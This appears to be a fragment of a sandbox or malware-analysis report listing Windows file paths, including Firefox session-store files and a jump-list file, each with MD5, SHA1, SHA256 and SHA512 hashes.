SHA256 94a7270f065d3a53a6052a343148506fdbee2963f3cdc2110825ab302ba93268
SHA512 bf25a58fe019058580f3076a23c41b35cbd3c8188227b0cd80a43be035531cd6349daffdf91e72c97eb3e7f17459590d08c0e72c49838f48a3971cd06bc14228

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 94afe7733d1ad32b97d2eb9509d935e0
SHA1 41e65d6db714148a03271c08441ac8770fbfb531
SHA256 7a2542ead86ba5de4942c275a13c7fd3b352251d10b74995faec3ef0e5357133
SHA512 ca94db3b1d3f91946235a293b56f688fb70af87d6a5277d1ca58fb0e59c3492001fcd7cd59e758db39b75f8948a939ee60783d208354c56a964339a9550924b3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3b1psp2h.default-release\sessionstore-backups\recovery.jsonlz4

MD5 52b37c9644d9396a9da903c8c3749dd7
SHA1 a272a9578f4bd57c7bbedfd90ab7bd29201abdb7
SHA256 8212c7856e4be4c09e65199970fb5e9272514d2750dd8ef4624c1dcb399fc138
SHA512 8293dd0b33d6b1a50d33e671d723deea0fe15029532acd2a62194d903c4d64837cbac60d0d6078533922d87dbb144d21f87c255761ba3406b1a29353a8bf6748

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3b1psp2h.default-release\sessionCheckpoints.json

MD5 2ad4fe43dc84c6adbdfd90aaba12703f
SHA1 28a6c7eff625a2da72b932aa00a63c31234f0e7f
SHA256 ecb4133a183cb6c533a1c4ded26b663e2232af77db1a379f9bd68840127c7933
SHA512 2ee947dcf3eb05258c7a8c45cb60082a697dbe6d683152fe7117d20f7d3eb2beaaf5656154b379193cdc763d7f2f3b114cf61b4dd0f8a65326e662165ccf89cc

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3b1psp2h.default-release\sessionstore.jsonlz4

MD5 26bc52242c05bbf30ab8f2f862a846a0
SHA1 8bebe83d088d5db09f2541f945b9f5cf53077385
SHA256 50f4c26e940b7d062132a982a5138f6be5a4956396dea278f09db6c115ebf642
SHA512 1fc2a8a7bb5e9767ab5cd007bd9169334631e93a0c91eaff3b0c6accac449615c1eb759b5b138f95ee573eb8a22166ba158129013378b0107a767e0cdb7d85ef

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3b1psp2h.default-release\prefs-1.js

MD5 e59f1e13c401da4a2992c9fb4b928821
SHA1 f32af5ccea94e4e4d195ab7ae52bd6578b1574b0
SHA256 004c271fab779213f1b93d6bb1b6dd0a37ddcce81210327c76567884dc314537
SHA512 96612e68b57708d203012cadf41d6f8f1dc3cb0af2f401c5f02367e3b73bf239a0ea43aa5c74bfddb9d1108d49f4a0510fac246f6f8865b9f7caa48395cbf4b6